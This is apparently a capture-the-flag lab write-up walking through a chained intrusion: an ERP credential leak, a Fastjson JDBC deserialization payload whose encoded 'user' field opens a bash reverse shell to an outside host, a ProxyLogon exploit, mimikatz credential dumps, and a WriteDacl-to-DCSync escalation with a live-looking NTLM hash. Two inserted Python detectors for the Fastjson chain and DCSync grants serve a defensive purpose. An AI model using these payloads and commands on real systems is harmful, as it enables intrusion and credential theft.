Topics
Fastjson JDBC attack, Exchange ProxyLogon RCE, DCSync attack, MISC
Flag1
Target range address: 39.99.233.132
Kick off with an fscan sweep.
```
fscan version: 1.7.1
start infoscan
(icmp) Target 39.99.233.132 is alive
[*] Icmp alive hosts len is: 1
39.99.233.132:80 open
39.99.233.132:8000 open
39.99.233.132:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle:http://39.99.233.132 code:200 len:19813 title:lumia
[*] WebTitle:http://39.99.233.132:8000 code:302 len:0 title:None 跳转url: http://39.99.233.132:8000/login.html
[*] WebTitle:http://39.99.233.132:8000/login.html code:200 len:5662 title:Lumia ERP
```
华夏ERP is running on port 8000.
华夏ERP account/password disclosure + backend RCE (recent vulnerability chain)
[http://39.99.233.132:8000/user/getAllList;.ico](http://39.99.233.132:8000/user/getAllList;.ico)
This endpoint returns the administrator's account and password hash; a cmd5 lookup resolves it to 123456.
That gives us one set of admin credentials: admin/123456
https://www.cnblogs.com/bmjoker/p/14856437.html
The backend search page has a Fastjson 1.2.55 deserialization issue, and since the challenge's stated topic is JDBC, go find a PoC for that.
https://su18.org/post/fastjson/#8-fastjson-1268
```json
{
  "@type": "java.lang.AutoCloseable",
  "@type": "com.mysql.jdbc.JDBC4Connection",
  "hostToConnectTo": "114.116.119.253",
  "portToConnectTo": 3306,
  "url": "jdbc:mysql://114.116.119.253:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
  "databaseToConnectTo": "test",
  "info": {
    "@type": "java.util.Properties",
    "PORT": "3306",
    "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
    "autoDeserialize": "true",
    "user": "base64ZGVzZXJfQ0MzMV9iYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHhNVFF1TVRFMkxqRXhPUzR5TlRNdk56YzNOeUF3UGlZeH18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9",
    "PORT.1": "3306",
    "HOST.1": "172.20.64.40",
    "NUM_HOSTS": "1",
    "HOST": "172.20.64.40",
    "DBNAME": "test"
  }
}
```
```http
GET /user/list?search=%7B%0A%09%22%40type%22%3A%20%22java.lang.AutoCloseable%22%2C%0A%09%22%40type%22%3A%20%22com.mysql.jdbc.JDBC4Connection%22%2C%0A%09%22hostToConnectTo%22%3A%20%22114.116.119.253%22%2C%0A%09%22portToConnectTo%22%3A%203308%2C%0A%09%22url%22%3A%20%22jdbc%3Amysql%3A%2F%2F114.116.119.253%3A3308%2Ftest%3FautoDeserialize%3Dtrue%26statementInterceptors%3Dcom.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%0A%09%22databaseToConnectTo%22%3A%20%22test%22%2C%0A%09%22info%22%3A%20%7B%0A%09%09%22%40type%22%3A%20%22java.util.Properties%22%2C%0A%09%09%22PORT%22%3A%20%223306%22%2C%0A%09%09%22statementInterceptors%22%3A%20%22com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor%22%2C%0A%09%09%22autoDeserialize%22%3A%20%22true%22%2C%0A%09%09%22user%22%3A%20%22base64ZGVzZXJfQ0MzMV9iYXNoIC1jIHtlY2hvLFltRnphQ0F0YVNBK0ppQXZaR1YyTDNSamNDOHhNVFF1TVRFMkxqRXhPUzR5TlRNdk56YzNOeUF3UGlZeH18e2Jhc2U2NCwtZH18e2Jhc2gsLWl9%22%2C%0A%09%09%22PORT.1%22%3A%20%223306%22%2C%0A%09%09%22HOST.1%22%3A%20%22172.20.64.40%22%2C%0A%09%09%22NUM_HOSTS%22%3A%20%221%22%2C%0A%09%09%22HOST%22%3A%20%22172.20.64.40%22%2C%0A%09%09%22DBNAME%22%3A%20%22test%22%0A%09%7D%0A%7D&currentPage=1&pageSize=10 HTTP/1.1
Host: 39.99.233.132:8000
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Edg/118.0.2088.46
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://39.99.233.132:8000/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=B49FB20B635BD8913377199CAAED066E; Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1697723127; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1697724188
If-Modified-Since: Sun, 23 Oct 2022 11:30:06 GMT
Connection: close
```
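As an added detection example (my code, not the writeup's and not part of any tool it uses): a small Python checker that pulls the Fastjson AutoCloseable/JDBC4Connection chain shown above out of logged request parameters. It goes slightly beyond the page by also flagging the duplicate-`@type` trick on its own, regardless of gadget class. The request samples are constructed and the host name is a placeholder.

```python
import json
from urllib.parse import parse_qs, urlencode

# Gadget classes from the payload above; the chain needs both to pass autotype.
GADGET_TYPES = {"java.lang.AutoCloseable", "com.mysql.jdbc.JDBC4Connection"}
# Connector/J options that let a malicious MySQL server drive Java deserialization
# (queryInterceptors is the Connector/J 8.x spelling of statementInterceptors).
JDBC_SINK_OPTIONS = ("autoDeserialize", "statementInterceptors", "queryInterceptors")


def extract_pairs(json_text):
    """Parse JSON but keep duplicate keys. A plain json.loads() keeps only the last
    "@type", which would hide the double-@type trick used to get past the
    AutoCloseable check; the hook sees every (key, value) pair of every object."""
    pairs, dup_type_objects = [], 0

    def hook(items):
        nonlocal dup_type_objects
        if sum(1 for k, _ in items if k == "@type") > 1:
            dup_type_objects += 1
        pairs.extend((k, v) for k, v in items if isinstance(v, str))
        return items  # nested objects stay as lists of (key, value) tuples

    json.loads(json_text, object_pairs_hook=hook)
    return pairs, dup_type_objects


def assess(json_text):
    """Return the findings for one JSON value (empty list = nothing suspicious)."""
    try:
        pairs, dup_type_objects = extract_pairs(json_text)
    except ValueError:
        return []  # not JSON, nothing for Fastjson to autotype
    findings = []
    gadgets = sorted({v for k, v in pairs if k == "@type" and v in GADGET_TYPES})
    if gadgets:
        findings.append("autotype gadget class: " + ", ".join(gadgets))
    if dup_type_objects:
        findings.append("duplicate @type in one object (AutoCloseable bypass pattern)")
    sinks = sorted({opt for opt in JDBC_SINK_OPTIONS
                    for k, v in pairs if opt in k or opt in v})
    if sinks and any("jdbc:" in v.lower() for _, v in pairs):
        findings.append("JDBC URL with deserialization sink option: " + ", ".join(sinks))
    return findings


def scan_request(request_line):
    """Scan every query parameter of a logged GET request; return {param: findings}."""
    _, _, query = request_line.partition("?")
    results = {}
    for name, values in parse_qs(query).items():
        findings = [f for v in values for f in assess(v)]
        if findings:
            results[name] = findings
    return results


# Constructed samples: a normal ERP search, and the chain above with a placeholder
# host and the attacker-controlled "user" value replaced by a marker.
CHAIN = ('{"@type":"java.lang.AutoCloseable","@type":"com.mysql.jdbc.JDBC4Connection",'
         '"hostToConnectTo":"ATTACKER_HOST","portToConnectTo":3306,'
         '"url":"jdbc:mysql://ATTACKER_HOST:3306/test?autoDeserialize=true'
         '&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",'
         '"info":{"@type":"java.util.Properties","autoDeserialize":"true",'
         '"user":"<attacker-controlled>"}}')
BENIGN = "/user/list?" + urlencode({"search": '{"userName":"admin"}', "currentPage": "1"})
MALICIOUS = "/user/list?" + urlencode({"search": CHAIN, "currentPage": "1"})

if __name__ == "__main__":
    for req in (BENIGN, MALICIOUS):
        print(req[:40], "->", scan_request(req) or "clean")
```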
Got a webshell. Next I want to persist, so I went with a vshell implant.
Grab the flag first.
Then just wait in vshell for the server to check in.
Flag2
Once it has checked in, first upload fscan for post-exploitation.
```
[*] 172.22.3.9 XIAORANG\XIAORANG-EXC01 Windows Server 2016 Datacenter 14393
[*] WebTitle:http://172.22.3.12:8000 code:302 len:0 title:None 跳转url: http://172.22.3.12:8000/login.html
[*] WebTitle:http://172.22.3.12:8000/login.html code:200 len:5662 title:Lumia ERP
[*] WebTitle:http://172.22.3.9:81 code:403 len:1157 title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle:https://172.22.3.9:8172 code:404 len:0 title:None
[*] WebTitle:http://172.22.3.9 code:403 len:0 title:None
[*] WebTitle:https://172.22.3.9 code:302 len:0 title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle:https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237 title:Outlook
```
https://172.22.3.9
We see an Outlook login; combined with the host name, this points at the Exchange ProxyLogon bug that writes a shell through the logon page.
Before that, tunnel a proxy out first: vshell makes tunnel setup easy, so open a SOCKS5 listener and point your proxychains config at it.
Once that is configured, pull out the exploit and fire away!
https://github.com/hausec/ProxyLogon
Run this exploit under python2.
```shell
proxychains python2 exchange-rce.py 172.22.3.9 [email protected]
```
But that is still an inconvenient way to get a shell, so fire up AntSword (蚁剑).
Remember to enable "ignore HTTPS certificate".
Next we need persistence. vshell again, but this host has no outbound internet access, so AntSword has to do the work.
Flag4
Standard Windows domain pentest flow: our current user is SYSTEM, a high-privilege account, so mimikatz can be run directly. Scan with fscan first and upload mimikatz along the way, dumping logon credentials with sekurlsa::logonpasswords.
We dumped everything. That gives us the NTLM hashes of the xiaorang users, which would allow a pass-the-hash spray.
It seems SMB isn't enabled, but no matter; this is where BloodHound comes in for collection.
```
sharphound.exe -c all
```
Pull the results down, import them into BloodHound and analyze; the wait is slow, it's neo4j after all...
Borrowing XZ's screenshot; damn, my BloodHound hung while uploading the JSON files, so annoying.
DCSync Dump
https://github.com/CravateRouge/bloodyAD
A handier tool for using the WriteDacl right to grant DCSync and then dump hashes.
Since we hold WriteDacl, we can add any ACE for any user in the domain. Here the Zhangtong user is granted DCSync. Our current host is XIAORANG-EXC01, a member of the Exchange group, so it has WriteDacl as well.
```shell
proxychains dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :46c981f71101f966f05c247c73483379 -action write -rights DCSync -principal Zhangtong -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2
```
But that's not actually how I wrote it. I figured you could just grant DCSync to the current machine, i.e. to its own machine account, and then dump directly with mimikatz.
```shell
proxychains dacledit.py xiaorang.lab/XIAORANG-EXC01$ -hashes :46c981f71101f966f05c247c73483379 -action write -rights DCSync -principal XIAORANG-EXC01$ -target-dn 'dc=xiaorang,dc=lab' -dc-ip 172.22.3.2
```
-hashes: the NTLM hash of the current machine account
-action: the operation, here write (add an ACE)
-principal: the user that receives the right
-target-dn: the distinguished name of the domain object
-dc-ip: the domain controller's IP
We already saw the DC's IP in the fscan results.
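An added defender-side example (my code, not from the writeup and not part of dacledit.py or bloodyAD): a Python audit of the domain object's DACL in SDDL form that reports which principals hold the replication extended rights the command above writes, before and after such a write. The SDDL strings, the machine-account SID and the SID-to-name mapping are constructed placeholders.

```python
import re

# Extended-right GUIDs that enable directory replication, i.e. DCSync.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
DCSYNC_PAIR = {"DS-Replication-Get-Changes", "DS-Replication-Get-Changes-All"}
# SDDL aliases that are expected to hold these rights on the domain head.
EXPECTED = {"SY", "BA", "DA", "EA", "ED"}
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


def parse_aces(sddl):
    """Return (type, flags, rights, object_guid, inherit_guid, sid) for every DACL ACE."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else sddl
    dacl = dacl.split("S:", 1)[0]  # drop a trailing SACL if one is present
    return [m.groups() for m in ACE_RE.finditer(dacl)]


def replication_grants(sddl):
    """Map each SID to the replication rights granted to it by allow ACEs."""
    grants = {}
    for ace_type, _flags, rights, guid, _inh, sid in parse_aces(sddl):
        if ace_type not in ("A", "OA"):
            continue  # deny and audit ACEs never grant anything
        codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        held = set()
        if "GA" in codes or ("CR" in codes and guid == ""):
            held = set(REPL_RIGHTS.values())  # GenericAll / every extended right
        elif "CR" in codes and guid.lower() in REPL_RIGHTS:
            held = {REPL_RIGHTS[guid.lower()]}
        if held:
            grants.setdefault(sid, set()).update(held)
    return grants


def audit(sddl, names=None):
    """List (principal, rights) for unexpected principals able to DCSync."""
    names = names or {}
    return [(names.get(sid, sid), sorted(held))
            for sid, held in replication_grants(sddl).items()
            if DCSYNC_PAIR <= held and sid not in EXPECTED]


# Constructed, trimmed domain-object DACL in SDDL form before and after the write.
BASELINE = ("O:DAG:DAD:AI"
            "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
            "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
            "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DA)"
            "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DA)"
            "(A;;CCDCLCSWRPWPLOCRRCWDWO;;;BA)"
            "(A;;GA;;;SY)")
MACHINE_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"  # placeholder SID
AFTER_WRITE = BASELINE + (
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{MACHINE_SID})"
    f"(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{MACHINE_SID})")
NAMES = {MACHINE_SID: "XIAORANG\\XIAORANG-EXC01$"}  # placeholder resolution

if __name__ == "__main__":
    print("before:", audit(BASELINE, NAMES) or "only expected principals")
    print("after: ", audit(AFTER_WRITE, NAMES))
```

The same check run periodically (or on a 5136 directory-change event for the domain object) catches the WriteDacl-to-DCSync step regardless of which tool wrote the ACE.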
Then dump straight away with mimikatz.
```
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" >5.log
```
Then log in with psexec.
Owned.
Flag3
```
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:xiaorang.lab" >7.log
```
The lumia user has a secret.zip; pure MISC, so I'm skipping it...
Time is money!
flag{cf0c753c-233f-4729-8984-0746ea5878b7}